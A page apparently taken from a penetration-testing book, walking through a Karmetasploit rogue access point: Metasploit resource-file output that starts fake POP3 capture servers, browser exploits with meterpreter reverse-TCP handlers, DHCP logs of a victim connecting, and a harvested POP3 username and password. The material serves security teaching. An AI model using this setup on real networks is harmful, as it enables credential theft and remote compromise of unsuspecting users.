background image

Karmetasploit

181

URIPATH => /ads
resource (karma.rc)> 

run

[*] Auxiliary module execution completed

resource (karma.rc)> use auxiliary/server/capture/pop3

resource (karma.rc)> 

set SRVPORT 110

SRVPORT => 110
resource (karma.rc)> 

set SSL false

SSL => false
resource (karma.rc)> 

run

. . . SNIP . . .

 [*] Starting exploit windows/browser/winzip_fileview with payload windows/

meterpreter/reverse_tcp

[*] Using URL: http://0.0.0.0:55550/N9wReDJhfKg
[*] Local IP: http://192.168.1.101:55550/N9wReDJhfKg
[*] Server started.

 [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333

[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 10.0.0.1:3333
[*] Starting the payload handler...
[*] Started reverse handler on 10.0.0.1:6666
[*] Starting the payload handler...
[*] --- Done, found 15 exploit modules
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://192.168.1.101:55550/ads
[*] Server started.

As you can see, a great deal is happening with the resource file. In this 

listing, the 

LHOST

 address is set to 

10.0.0.1

 at  , the POP3 service (among others) 

is started at  , the 

autopwn

 exploits are loaded at  , and payloads are config-

ured at  .

Credential Harvesting

When a client connects to our malicious access point, the messages file we 
are tailing will show us when an IP address is handed out. This is our cue to 
switch back to 

msfconsole

 to see what is happening. Here, we see that a client 

connects and is assigned an IP address:

Apr  2 15:07:34 bt dhcpd: DHCPDISCOVER from 00:17:9a:b2:b1:6d via at0
Apr  2 15:07:35 bt dhcpd: DHCPOFFER on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
Apr  2 15:07:35 bt dhcpd: DHCPREQUEST for 10.0.0.100 (10.0.0.1) from 00:17:9a:b2:b1:6d 

(v-xp-sp2-bare) via at0

Apr  2 15:07:35 bt dhcpd: DHCPACK on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0

The first thing our target does is open an email client. Karmetasploit is 

waiting, as shown here:

[*] DNS 10.0.0.100:1049 XID 45030 (IN::A time.windows.com)
[*] DNS 10.0.0.100:1049 XID 47591 (IN::A pop3.securemail.com)

 [*] POP3 LOGIN 10.0.0.100:1102 bsmith / s3cr3tp4s5